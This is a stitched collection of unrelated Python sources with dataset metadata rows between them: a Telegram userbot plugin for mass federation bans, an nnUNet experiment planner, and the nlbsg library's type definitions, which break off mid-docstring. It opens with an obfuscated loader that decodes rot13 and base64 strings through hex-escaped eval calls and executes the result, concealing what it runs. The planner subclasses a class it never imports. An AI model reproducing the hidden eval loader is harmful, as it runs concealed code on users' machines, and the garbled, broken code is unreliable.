TIxBtbWPDxWPKRhpUI0XTkcozgIpzjcPtxWPDxWV2kcozgmIzymnKEyMP5uMTDboTyhn1IloPxXPDxWPDxwL2uyL2gTo3WUMKEFMKS1MKA0XTkcozgIpzjcPtxWPDxWV2AbMJAeEz9loIOupzSgMKEypaZbp2y0MHAioaEyoaDfoTyhn1IloPxXPDbWPzEyMvOxo19mqUIzMvukXGbXPDbWq2ucoTHtIUW1MGbXPDy1pzjtCFOkYzqyqPtcPtxWqUW5BtbWPDyvLKAcL0AlLKqfnJ5aXUIloPxXPDxWpF50LKAeK2EiozHbXDbWPJI4L2IjqPOSrTAypUEco24tLKZtMGbXPDxWpUWcoaDbMFxXPDxWpF50LKAeK2EiozHbXDbWPDywo250nJ51MDbXPaOupaAyMQ11pzkjLKWmMFuupzqmYzuip3DcPzWup2IIHxj9pTSlp2IxYaAwnTIgMFfvBv8iVvgjLKWmMJDhozI0oT9wPaOlnJ50VPtvITSlM2I0VSIFGPNgVPVtXlOvLKAyIIWZXDbXPzyzVTSlM3ZhLaIlpQbXPJW1paOsrT1fVQ0trT1fYzI0pzIyYxIfMJ1yoaEHpzIyYzMlo21mqUWcozpbo3OyovuupzqmYzW1paNfVPWlVvxhpzIuMPtcXDbWMz9lVTy0MJ0tnJ4tLaIlpS94oJj6PtxWpI9vqKWjYaO1qPucqTIgXDcyoUAyBtbWpF5jqKDbLzSmMIIFGPxXPKOlnJ50VPtvVvxXPvAGnJ5wMFO3MFOxolOho3Dtq2ShqPO0olO2nKAcqPO0nTHtpz9iqPO1pzjtLJqunJ4tq2HtLJExVTy0VTyhqT8tqTuyVUMcp2y0MJDtoTymqPNXoTyhn3AJnKAcqTIxYzSxMPuvLKAyIIWZXlViVvxXPzyzVTSlM3ZhqTulMJSxpmbXPJ51oI90nUWyLJEmVQ0tnJ50XTSlM3ZhqTulMJSxplxXMJkmMGbXPJ51oI90nUWyLJEmCGRjPtbwFJLtLaIlpPOcoaO1qPOcplOjpz92nJEyMPO3MFOznKWmqPOjLKWmMFOcqPOuozDtoJSjVT91pvOlMKA1oUEmVTShMPO0nTIhVT1un2HtLJ5iqTuypvOfnKA0VT91qPOiMvOcqPO0olOjLKAmVUEiVTWup2ywVTAlLKqfnJ5aVUEiVTqyqPOgLKucoKIgVUWyp3IfqUZXnJLtLKWapl5vqKWjBtbWpUWcoaDtXPWpoyOlo2Ayp3AcozptDaIlpPOznJkyKT4vXDbWMz9lVTxtnJ4tpzShM2HboaIgK3EbpzIuMUZcBtbWPKqipzgypvN9VSEbpzIuMPu0LKWaMKD9LaIlpS9mnKEyGJSjK3OupaAyYPOupzqmCFukK2W1paNfXFxXPDy3o3WeMKVhp2I0ETSyoJ9hXSElqJHcPtxWq29ln2IlYaA0LKW0XPxXpI9vqKWjYzcinJ4bXDcjpzyhqPNbVykhH3EupaEcozptD3Wuq2kcozqpovVcPzMipvOcVTyhVUWuozqyXT51oI90nUWyLJEmXGbXPKqipzgypvN9VSEbpzIuMPu0LKWaMKD9MT9sp3E1MzLfVTSlM3Z9XURfXFxXPKqipzgypv5mMKERLJIgo24bIUW1MFxXPKqipzgypv5mqTSlqPtcPtckYzcinJ4bXDbXpUWcoaDtXPWpoyOlo2Ayp3ZtD29gpTkyqTIxVvxX'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
| 2,152.545455
| 5,806
| 0.99244
| 116
| 23,678
| 202.577586
| 0.560345
| 0.001787
| 0.001532
| 0.002043
| 0.005787
| 0.005787
| 0.005787
| 0.003915
| 0.003915
| 0.003915
| 0
| 0.108197
| 0.00152
| 23,678
| 11
| 5,807
| 2,152.545455
| 0.885754
| 0.001563
| 0
| 0
| 0
| 0.25
| 0.992555
| 0.989002
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9a0c8818413df21250e8adc2eb298cc1a332c3e
| 10,707
|
py
|
Python
|
ub/modules/fban-unfban.py
|
TAMILVIP007/Ichigo
|
9be07bcc96f9e714b745f6d72dfa521f0a34dc90
|
[
"MIT"
] | null | null | null |
ub/modules/fban-unfban.py
|
TAMILVIP007/Ichigo
|
9be07bcc96f9e714b745f6d72dfa521f0a34dc90
|
[
"MIT"
] | null | null | null |
ub/modules/fban-unfban.py
|
TAMILVIP007/Ichigo
|
9be07bcc96f9e714b745f6d72dfa521f0a34dc90
|
[
"MIT"
] | 1
|
2022-03-09T14:42:48.000Z
|
2022-03-09T14:42:48.000Z
|
# Ultroid - UserBot
# Copyright (C) 2020 TeamUltroid
#
# This file is a part of < https://github.com/TeamUltroid/Ultroid/ >
# PLease read the GNU Affero General Public License in
# <https://www.github.com/TeamUltroid/Ultroid/blob/main/LICENSE/>.
#ported to Javes 3 By Sh1vam with a few changes
from ub import bot as borg
import asyncio
import os
from ..utils import admin_cmd
from telethon.errors.rpcerrorlist import YouBlockedUserError
FED_LOGGER=int(os.environ.get("FED_LOGGER",-1001451354500))
from ub import bot as ultroid_bot
from ub.events import register
bot = "@MissRose_bot"
from telethon.tl.functions.users import GetFullUserRequest
@register(pattern="^!superfban ?(.*)", outgoing=True)
async def _(event):
msg = await event.edit( "Starting a Mass-FedBan...")
fedList = []
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await ultroid_bot.download_media(
previous_message, "fedlist"
)
file = open(downloaded_file_name, encoding="utf8")
lines = file.readlines()
for line in lines:
try:
fedList.append(line[:36])
except BaseException:
pass
arg = event.text.split(" ", maxsplit=2)
FBAN = arg[1]
REASON = arg[2] if len(arg) > 2 else " #TBMassBanned "
else:
FBAN = previous_message.sender_id
try:
REASON = event.text.split(" ", maxsplit=1)[1]
except BaseException:
REASON = ""
if REASON.strip() == "":
REASON = " #TBMassBanned "
else:
arg = event.text.split(" ", maxsplit=2)
if len(arg) > 2:
try:
FBAN = arg[1]
REASON = arg[2]
except BaseException:
return await msg.edit("`No user designated!`")
else:
try:
FBAN = arg[1]
REASON = " #TBMassBanned "
except BaseException:
return await msg.edit("`No user designated!`")
try:
if str(FBAN) == str(929138153):
await msg.edit("You can't ban my dev !!")
return
elif FBAN.startswith("@"):
try:
x = await borg.get_entity(str(FBAN))
uid = x.id
if str(uid) == str( 929138153):
await msg.edit("You can't ban my dev!!")
return
except Exception as e:
print(e)
return await msg.edit(str(e))
except Exception as e:
print(e)
return await msg.edit(str(e))
chat = await event.get_chat()
if not len(fedList):
for a in range(3):
async with ultroid_bot.conversation("@MissRose_bot") as bot_conv:
await bot_conv.send_message("/start")
await asyncio.sleep(3)
await bot_conv.send_message("/myfeds")
await asyncio.sleep(3)
try:
response = await bot_conv.get_response()
except asyncio.exceptions.TimeoutError:
return await msg.edit(
"`Seems like rose isn't responding, or, the plugin is misbehaving`"
)
await asyncio.sleep(3)
if "make a file" in response.text or "Looks like" in response.text:
await response.click(0)
await asyncio.sleep(3)
fedfile = await bot_conv.get_response()
await asyncio.sleep(3)
if fedfile.media:
downloaded_file_name = await ultroid_bot.download_media(
fedfile, "fedlist"
)
await asyncio.sleep(6)
file = open(downloaded_file_name, "r", errors="ignore")
lines = file.readlines()
for line in lines:
try:
fedList.append(line[:36])
except BaseException:
pass
elif "You can only use fed commands once every 5 minutes" in (
await bot_conv.get_edit
):
await msg.edit("Try again after 5 mins.")
return
if not fedList:
await msg.edit(
f"Unable to collect FedAdminList. Retrying ({a+1}/3)..."
)
else:
break
else:
await msg.edit("Error")
In = False
tempFedId = ""
for x in response.text:
if x == "`":
if In:
In = False
fedList.append(tempFedId)
tempFedId = ""
else:
In = True
elif In:
tempFedId += x
if not fedList:
await msg.edit("Unable to collect FedAdminList.")
return
await msg.edit(f"FBaning in {len(fedList)} feds.")
try:
await ultroid_bot.send_message(FED_LOGGER, '/start')
except BaseException:
await msg.edit("Specified FBan Group ID is incorrect.")
return
await asyncio.sleep(3)
exCount = 0
for fed in fedList:
await ultroid_bot.send_message(FED_LOGGER, f"/joinfed {fed}")
await asyncio.sleep(3)
await ultroid_bot.send_message(FED_LOGGER, f"/fban {FBAN} {REASON}")
await asyncio.sleep(3)
try:
os.remove("fedlist")
except Exception as e:
print(f'Error in removing FedAdmin file.\n{e}')
await msg.edit(
"SuperFBan Completed.\n#TB"
)
@register(pattern="^!superunfban ?(.*)", outgoing=True)
async def _(event):
msg = await event.edit( "Starting a Mass-UnFedBan...")
fedList = []
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await ultroid_bot.download_media(
previous_message, "fedlist"
)
file = open(downloaded_file_name, encoding="utf8")
lines = file.readlines()
for line in lines:
try:
fedList.append(line[:36])
except BaseException:
pass
arg = event.text.split(" ", maxsplit=2)
FBAN = arg[1]
REASON = arg[2] if len(arg) > 2 else ""
else:
FBAN = previous_message.sender_id
try:
REASON = event.text.split(" ", maxsplit=1)[1]
except BaseException:
REASON = ""
if REASON.strip() == "":
REASON = ""
else:
arg = event.text.split(" ", maxsplit=2)
if len(arg) > 2:
try:
FBAN = arg[1]
REASON = arg[2]
except BaseException:
return await msg.edit("`No user designated!`")
else:
try:
FBAN = arg[1]
REASON = " #TBMassUnBanned "
except BaseException:
return await msg.edit("`No user designated!`")
chat = await event.get_chat()
if not len(fedList):
for a in range(3):
async with ultroid_bot.conversation("@MissRose_bot") as bot_conv:
await bot_conv.send_message("/start")
await asyncio.sleep(3)
await bot_conv.send_message("/myfeds")
await asyncio.sleep(3)
try:
response = await bot_conv.get_response()
except asyncio.exceptions.TimeoutError:
return await msg.edit(
"`Seems like rose isn't responding, or, the plugin is misbehaving`"
)
await asyncio.sleep(3)
if "make a file" in response.text or "Looks like" in response.text:
await response.click(0)
await asyncio.sleep(3)
fedfile = await bot_conv.get_response()
await asyncio.sleep(3)
if fedfile.media:
downloaded_file_name = await ultroid_bot.download_media(
fedfile, "fedlist"
)
await asyncio.sleep(6)
file = open(downloaded_file_name, "r", errors="ignore")
lines = file.readlines()
for line in lines:
try:
fedList.append(line[:36])
except BaseException:
pass
elif "You can only use fed commands once every 5 minutes" in (
await bot_conv.get_edit
):
await msg.edit("Try again after 5 mins.")
return
if not fedList:
await msg.edit(
f"Unable to collect FedAdminList. Retrying ({a+1}/3)..."
)
else:
break
else:
await msg.edit("Error")
In = False
tempFedId = ""
for x in response.text:
if x == "`":
if In:
In = False
fedList.append(tempFedId)
tempFedId = ""
else:
In = True
elif In:
tempFedId += x
if not fedList:
await msg.edit("Unable to collect FedAdminList.")
return
await msg.edit(f"UnFBaning in {len(fedList)} feds.")
try:
await ultroid_bot.send_message(FED_LOGGER, '/start')
except BaseException:
await msg.edit("Specified FBan Group ID is incorrect.")
return
await asyncio.sleep(3)
exCount = 0
for fed in fedList:
await ultroid_bot.send_message(FED_LOGGER, f"/joinfed {fed}")
await asyncio.sleep(3)
await ultroid_bot.send_message(FED_LOGGER, f"/unfban {FBAN} {REASON}")
await asyncio.sleep(3)
try:
os.remove("fedlist")
except Exception as e:
print(f'Error in removing FedAdmin file.\n{e}')
await msg.edit(
"SuperUnFBan Completed.\n#TB"
)
| 36.793814
| 91
| 0.492855
| 1,108
| 10,707
| 4.674188
| 0.1787
| 0.037073
| 0.055609
| 0.055609
| 0.859625
| 0.85306
| 0.85306
| 0.85306
| 0.85306
| 0.832593
| 0
| 0.016186
| 0.417204
| 10,707
| 290
| 92
| 36.92069
| 0.813782
| 0.026058
| 0
| 0.859779
| 0
| 0
| 0.122
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.01476
| 0.02952
| 0
| 0.088561
| 0.01476
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9a9947446666ede6fd37cab7abe6810d45b9160
| 12,220
|
py
|
Python
|
nnunet/experiment_planning/alternative_experiment_planning/target_spacing/experiment_planner_baseline_3DUNet_v21_noResampling.py
|
MrGiovanni/nnUNet
|
0f120d70f8cd8df8932435387982cc11b2b9c75b
|
[
"Apache-2.0"
] | 1
|
2021-05-26T11:03:21.000Z
|
2021-05-26T11:03:21.000Z
|
nnunet/experiment_planning/alternative_experiment_planning/target_spacing/experiment_planner_baseline_3DUNet_v21_noResampling.py
|
MrGiovanni/nnUNet
|
0f120d70f8cd8df8932435387982cc11b2b9c75b
|
[
"Apache-2.0"
] | null | null | null |
nnunet/experiment_planning/alternative_experiment_planning/target_spacing/experiment_planner_baseline_3DUNet_v21_noResampling.py
|
MrGiovanni/nnUNet
|
0f120d70f8cd8df8932435387982cc11b2b9c75b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import deepcopy
import numpy as np
from nnunet.experiment_planning.experiment_planner_baseline_3DUNet_v21 import \
ExperimentPlanner3D_v21
from nnunet.experiment_planning.common_utils import get_pool_and_conv_props
from nnunet.network_architecture.generic_UNet import Generic_UNet
from nnunet.paths import *
class ExperimentPlanner3D_v21_noResampling(ExperimentPlanner3D_v21):
def __init__(self, folder_with_cropped_data, preprocessed_output_folder):
super(ExperimentPlanner3D_v21_noResampling, self).__init__(folder_with_cropped_data, preprocessed_output_folder)
self.data_identifier = "nnUNetData_noRes_plans_v2.1"
self.plans_fname = join(self.preprocessed_output_folder,
"nnUNetPlansv2.1_noRes_plans_3D.pkl")
self.preprocessor_name = "PreprocessorFor3D_NoResampling"
def plan_experiment(self):
"""
DIFFERENCE TO ExperimentPlanner3D_v21: no 3d lowres
:return:
"""
use_nonzero_mask_for_normalization = self.determine_whether_to_use_mask_for_norm()
print("Are we using the nonzero mask for normalizaion?", use_nonzero_mask_for_normalization)
spacings = self.dataset_properties['all_spacings']
sizes = self.dataset_properties['all_sizes']
all_classes = self.dataset_properties['all_classes']
modalities = self.dataset_properties['modalities']
num_modalities = len(list(modalities.keys()))
target_spacing = self.get_target_spacing()
new_shapes = [np.array(i) / target_spacing * np.array(j) for i, j in zip(spacings, sizes)]
max_spacing_axis = np.argmax(target_spacing)
remaining_axes = [i for i in list(range(3)) if i != max_spacing_axis]
self.transpose_forward = [max_spacing_axis] + remaining_axes
self.transpose_backward = [np.argwhere(np.array(self.transpose_forward) == i)[0][0] for i in range(3)]
# we base our calculations on the median shape of the datasets
median_shape = np.median(np.vstack(new_shapes), 0)
print("the median shape of the dataset is ", median_shape)
max_shape = np.max(np.vstack(new_shapes), 0)
print("the max shape in the dataset is ", max_shape)
min_shape = np.min(np.vstack(new_shapes), 0)
print("the min shape in the dataset is ", min_shape)
print("we don't want feature maps smaller than ", self.unet_featuremap_min_edge_length, " in the bottleneck")
# how many stages will the image pyramid have?
self.plans_per_stage = list()
target_spacing_transposed = np.array(target_spacing)[self.transpose_forward]
median_shape_transposed = np.array(median_shape)[self.transpose_forward]
print("the transposed median shape of the dataset is ", median_shape_transposed)
print("generating configuration for 3d_fullres")
self.plans_per_stage.append(self.get_properties_for_stage(target_spacing_transposed, target_spacing_transposed,
median_shape_transposed,
len(self.list_of_cropped_npz_files),
num_modalities, len(all_classes) + 1))
# thanks Zakiyi (https://github.com/MIC-DKFZ/nnUNet/issues/61) for spotting this bug :-)
# if np.prod(self.plans_per_stage[-1]['median_patient_size_in_voxels'], dtype=np.int64) / \
# architecture_input_voxels < HOW_MUCH_OF_A_PATIENT_MUST_THE_NETWORK_SEE_AT_STAGE0:
architecture_input_voxels_here = np.prod(self.plans_per_stage[-1]['patch_size'], dtype=np.int64)
if np.prod(self.plans_per_stage[-1]['median_patient_size_in_voxels'], dtype=np.int64) / \
architecture_input_voxels_here < self.how_much_of_a_patient_must_the_network_see_at_stage0:
more = False
else:
more = True
if more:
pass
self.plans_per_stage = self.plans_per_stage[::-1]
self.plans_per_stage = {i: self.plans_per_stage[i] for i in range(len(self.plans_per_stage))} # convert to dict
print(self.plans_per_stage)
print("transpose forward", self.transpose_forward)
print("transpose backward", self.transpose_backward)
normalization_schemes = self.determine_normalization_scheme()
only_keep_largest_connected_component, min_size_per_class, min_region_size_per_class = None, None, None
# removed training data based postprocessing. This is deprecated
# these are independent of the stage
plans = {'num_stages': len(list(self.plans_per_stage.keys())), 'num_modalities': num_modalities,
'modalities': modalities, 'normalization_schemes': normalization_schemes,
'dataset_properties': self.dataset_properties, 'list_of_npz_files': self.list_of_cropped_npz_files,
'original_spacings': spacings, 'original_sizes': sizes,
'preprocessed_data_folder': self.preprocessed_output_folder, 'num_classes': len(all_classes),
'all_classes': all_classes, 'base_num_features': self.unet_base_num_features,
'use_mask_for_norm': use_nonzero_mask_for_normalization,
'keep_only_largest_region': only_keep_largest_connected_component,
'min_region_size_per_class': min_region_size_per_class, 'min_size_per_class': min_size_per_class,
'transpose_forward': self.transpose_forward, 'transpose_backward': self.transpose_backward,
'data_identifier': self.data_identifier, 'plans_per_stage': self.plans_per_stage,
'preprocessor_name': self.preprocessor_name,
'conv_per_stage': self.conv_per_stage,
}
self.plans = plans
self.save_my_plans()
class ExperimentPlanner3D_v21_noResampling_16GB(ExperimentPlanner3D_v21_16GB):
def __init__(self, folder_with_cropped_data, preprocessed_output_folder):
super(ExperimentPlanner3D_v21_noResampling_16GB, self).__init__(folder_with_cropped_data, preprocessed_output_folder)
self.data_identifier = "nnUNetData_noRes_plans_16GB_v2.1"
self.plans_fname = join(self.preprocessed_output_folder,
"nnUNetPlansv2.1_noRes_16GB_plans_3D.pkl")
self.preprocessor_name = "PreprocessorFor3D_NoResampling"
def plan_experiment(self):
"""
DIFFERENCE TO ExperimentPlanner3D_v21: no 3d lowres
:return:
"""
use_nonzero_mask_for_normalization = self.determine_whether_to_use_mask_for_norm()
print("Are we using the nonzero mask for normalizaion?", use_nonzero_mask_for_normalization)
spacings = self.dataset_properties['all_spacings']
sizes = self.dataset_properties['all_sizes']
all_classes = self.dataset_properties['all_classes']
modalities = self.dataset_properties['modalities']
num_modalities = len(list(modalities.keys()))
target_spacing = self.get_target_spacing()
new_shapes = [np.array(i) / target_spacing * np.array(j) for i, j in zip(spacings, sizes)]
max_spacing_axis = np.argmax(target_spacing)
remaining_axes = [i for i in list(range(3)) if i != max_spacing_axis]
self.transpose_forward = [max_spacing_axis] + remaining_axes
self.transpose_backward = [np.argwhere(np.array(self.transpose_forward) == i)[0][0] for i in range(3)]
# we base our calculations on the median shape of the datasets
median_shape = np.median(np.vstack(new_shapes), 0)
print("the median shape of the dataset is ", median_shape)
max_shape = np.max(np.vstack(new_shapes), 0)
print("the max shape in the dataset is ", max_shape)
min_shape = np.min(np.vstack(new_shapes), 0)
print("the min shape in the dataset is ", min_shape)
print("we don't want feature maps smaller than ", self.unet_featuremap_min_edge_length, " in the bottleneck")
# how many stages will the image pyramid have?
self.plans_per_stage = list()
target_spacing_transposed = np.array(target_spacing)[self.transpose_forward]
median_shape_transposed = np.array(median_shape)[self.transpose_forward]
print("the transposed median shape of the dataset is ", median_shape_transposed)
print("generating configuration for 3d_fullres")
self.plans_per_stage.append(self.get_properties_for_stage(target_spacing_transposed, target_spacing_transposed,
median_shape_transposed,
len(self.list_of_cropped_npz_files),
num_modalities, len(all_classes) + 1))
# thanks Zakiyi (https://github.com/MIC-DKFZ/nnUNet/issues/61) for spotting this bug :-)
# if np.prod(self.plans_per_stage[-1]['median_patient_size_in_voxels'], dtype=np.int64) / \
# architecture_input_voxels < HOW_MUCH_OF_A_PATIENT_MUST_THE_NETWORK_SEE_AT_STAGE0:
architecture_input_voxels_here = np.prod(self.plans_per_stage[-1]['patch_size'], dtype=np.int64)
if np.prod(self.plans_per_stage[-1]['median_patient_size_in_voxels'], dtype=np.int64) / \
architecture_input_voxels_here < self.how_much_of_a_patient_must_the_network_see_at_stage0:
more = False
else:
more = True
if more:
pass
self.plans_per_stage = self.plans_per_stage[::-1]
self.plans_per_stage = {i: self.plans_per_stage[i] for i in range(len(self.plans_per_stage))} # convert to dict
print(self.plans_per_stage)
print("transpose forward", self.transpose_forward)
print("transpose backward", self.transpose_backward)
normalization_schemes = self.determine_normalization_scheme()
only_keep_largest_connected_component, min_size_per_class, min_region_size_per_class = None, None, None
# removed training data based postprocessing. This is deprecated
# these are independent of the stage
plans = {'num_stages': len(list(self.plans_per_stage.keys())), 'num_modalities': num_modalities,
'modalities': modalities, 'normalization_schemes': normalization_schemes,
'dataset_properties': self.dataset_properties, 'list_of_npz_files': self.list_of_cropped_npz_files,
'original_spacings': spacings, 'original_sizes': sizes,
'preprocessed_data_folder': self.preprocessed_output_folder, 'num_classes': len(all_classes),
'all_classes': all_classes, 'base_num_features': self.unet_base_num_features,
'use_mask_for_norm': use_nonzero_mask_for_normalization,
'keep_only_largest_region': only_keep_largest_connected_component,
'min_region_size_per_class': min_region_size_per_class, 'min_size_per_class': min_size_per_class,
'transpose_forward': self.transpose_forward, 'transpose_backward': self.transpose_backward,
'data_identifier': self.data_identifier, 'plans_per_stage': self.plans_per_stage,
'preprocessor_name': self.preprocessor_name,
'conv_per_stage': self.conv_per_stage,
}
self.plans = plans
self.save_my_plans()
| 56.055046
| 125
| 0.68707
| 1,532
| 12,220
| 5.117493
| 0.164491
| 0.032653
| 0.046429
| 0.056378
| 0.882908
| 0.882908
| 0.882908
| 0.882908
| 0.882908
| 0.882908
| 0
| 0.011483
| 0.23036
| 12,220
| 218
| 126
| 56.055046
| 0.822116
| 0.143699
| 0
| 0.881119
| 0
| 0
| 0.166763
| 0.042221
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027972
| false
| 0.013986
| 0.041958
| 0
| 0.083916
| 0.13986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a393d12602df948a3a389c0993eb871d57a7610
| 12,683
|
py
|
Python
|
nlbsg/types.py
|
yi-jiayu/nlbsg
|
0b6589706aab334daf768ecdaa8975ead8ea028e
|
[
"MIT"
] | 5
|
2019-04-21T03:11:22.000Z
|
2021-11-13T04:13:32.000Z
|
nlbsg/types.py
|
yi-jiayu/nlbsg
|
0b6589706aab334daf768ecdaa8975ead8ea028e
|
[
"MIT"
] | 10
|
2019-04-03T07:52:30.000Z
|
2021-06-01T23:56:30.000Z
|
nlbsg/types.py
|
yi-jiayu/nlbsg
|
0b6589706aab334daf768ecdaa8975ead8ea028e
|
[
"MIT"
] | 1
|
2019-04-21T04:04:26.000Z
|
2019-04-21T04:04:26.000Z
|
from dataclasses import dataclass
from typing import Iterable, Optional
@dataclass
class Title:
"""
Part of `SearchResponse`.
:var str bid:
:var str isbn:
:var str title_name:
:var str author:
:var str publish_year:
:var str media_code:
:var str media_desc:
Example `Title`::
Title(
bid='203125808',
isbn='1328915336 (paperback)',
title_name='Beren and Lúthien / by J.R.R. Tolkien ; edited by Christopher Tolkien ; with illustrations by Alan Lee.',
author='Tolkien, J. R. R. (John Ronald Reuel), 1892-1973',
publish_year='2018',
media_code='BK',
media_desc='Books'
)
"""
bid: str
isbn: str
title_name: str
author: str
publish_year: str
media_code: str
media_desc: str
@dataclass
class SearchResponse:
"""
Returned by `Client.search`.
:var str status:
:var str message:
:var Optional[str] error_message:
:var Optional[int] total_records:
:var Optional[int] next_record_position:
:var Optional[str] set_id:
:var Optional[Iterable[Title]] titles:
Example `SearchResponse`::
SearchResponse(
status='OK',
message='Operation completed successfully',
error_message=None,
total_records=52,
next_record_position=4,
set_id='PGE3676',
titles=tuple([
Title(
bid='203125808',
isbn='1328915336 (paperback)',
title_name='Beren and Lúthien / by J.R.R. Tolkien ; edited by Christopher Tolkien ; with illustrations by Alan Lee.',
author='Tolkien, J. R. R. (John Ronald Reuel), 1892-1973',
publish_year='2018',
media_code='BK',
media_desc='Books'
),
Title(
bid='204576140',
isbn='9780008214210 (electronic bk)',
title_name='Beren and l℗♭©ʻthien [electronic resource]. J. R. R Tolkien.',
author='Tolkien, J. R. R.',
publish_year='2017',
media_code='BK',
media_desc='Books'
)
])
)
"""
status: str
message: str
error_message: Optional[str]
total_records: Optional[int]
next_record_position: Optional[int]
set_id: Optional[str]
titles: Optional[Iterable[Title]]
@dataclass
class TitleDetail:
"""
Part of `GetTitleDetailsResponse`.
:var str bid:
:var str title_name:
:var str author:
:var str other_authors:
:var Optional[str] publisher:
:var str physical_desc:
:var Iterable[str] subjects:
:var str summary:
:var str notes:
:var str isbn:
:var Optional[str] issn:
:var Optional[str] n_title_name:
:var Optional[str] n_author:
:var Optional[str] n_publisher:
Example `TitleDetail`::
TitleDetail(
bid='203125808',
title_name='Beren and Lúthien / by J.R.R. Tolkien ; edited by Christopher Tolkien ; with illustrations by Alan Lee.',
author='Tolkien, J. R. R.',
other_authors='Tolkien, J. R. R. (John Ronald Reuel), 1892-1973|Tolkien, Christopher|Lee, Alan',
publisher=None,
physical_desc='288 pages (pages numbered 8-288) :chiefly color illustrations ;21 cm',
subjects=(
'Middle Earth (Imaginary place) Fiction',
'Elves Fiction',
'Fantasy fiction'
),
summary="The epic tale of Beren and Lúthien became an essential element in the evolution of The Silmarillion, the myths and legends of J.R.R. Tolkien's First Age of the World. Always key to the story is the fate that shadowed their love: Beren was a mortal man, Lúthien an immortal Elf. Her father, a great Elvish lord, imposed on Beren an impossible task before he might wed Lúthien: to rob the greatest of all evil beings, Melkor, of a Silmaril.Painstakingly restored from Tolkien's manuscripts and presented for the first time as a continuous and standalone story, Beren and Lúthien reunites fans of The Hobbit and The Lord of the Rings with Elves and Men, along with the rich landscape and creatures unique to Tolkien's Middle-earth. Christopher Tolkien tells the story in his father's own words by giving its original form as well as prose and verse passages from later texts that illustrate the narrative as it changed. -- from back cover.",
notes="First published by Harper Collins Publishers 2017.Includes abstractsThe epic tale of Beren and Lúthien became an essential element in the evolution of The Silmarillion, the myths and legends of J.R.R. Tolkien's First Age of the World. Always key to the story is the fate that shadowed their love: Beren was a mortal man, Lúthien an immortal Elf. Her father, a great Elvish lord, imposed on Beren an impossible task before he might wed Lúthien: to rob the greatest of all evil beings, Melkor, of a Silmaril.Painstakingly restored from Tolkien's manuscripts and presented for the first time as a continuous and standalone story, Beren and Lúthien reunites fans of The Hobbit and The Lord of the Rings with Elves and Men, along with the rich landscape and creatures unique to Tolkien's Middle-earth. Christopher Tolkien tells the story in his father's own words by giving its original form as well as prose and verse passages from later texts that illustrate the narrative as it changed. -- from back cover.",
isbn='1328915336 (paperback)',
issn=None,
n_title_name=None,
n_author=None,
n_publisher=None
)
"""
bid: str
title_name: str
author: str
other_authors: str
publisher: Optional[str]
physical_desc: str
subjects: Iterable[str]
summary: str
notes: str
isbn: str
issn: Optional[str]
n_title_name: Optional[str]
n_author: Optional[str]
n_publisher: Optional[str]
@dataclass
class GetTitleDetailsResponse:
"""
Returned by `Client.get_title_details`.
:var str status:
:var str message:
:var Optional[str] error_message:
:var Optional[TitleDetail] title_detail:
Example `GetTitleDetailsResponse`::
GetTitleDetailsResponse(
status='OK',
message='Operation completed successfully',
error_message=None,
title_detail=TitleDetail(
bid='203125808',
title_name='Beren and Lúthien / by J.R.R. Tolkien ; edited by Christopher Tolkien ; with illustrations by Alan Lee.',
author='Tolkien, J. R. R.',
other_authors='Tolkien, J. R. R. (John Ronald Reuel), 1892-1973|Tolkien, Christopher|Lee, Alan',
publisher=None,
physical_desc='288 pages (pages numbered 8-288) :chiefly color illustrations ;21 cm',
subjects=(
'Middle Earth (Imaginary place) Fiction',
'Elves Fiction',
'Fantasy fiction'
),
summary="The epic tale of Beren and Lúthien became an essential element in the evolution of The Silmarillion, the myths and legends of J.R.R. Tolkien's First Age of the World. Always key to the story is the fate that shadowed their love: Beren was a mortal man, Lúthien an immortal Elf. Her father, a great Elvish lord, imposed on Beren an impossible task before he might wed Lúthien: to rob the greatest of all evil beings, Melkor, of a Silmaril.Painstakingly restored from Tolkien's manuscripts and presented for the first time as a continuous and standalone story, Beren and Lúthien reunites fans of The Hobbit and The Lord of the Rings with Elves and Men, along with the rich landscape and creatures unique to Tolkien's Middle-earth. Christopher Tolkien tells the story in his father's own words by giving its original form as well as prose and verse passages from later texts that illustrate the narrative as it changed. -- from back cover.",
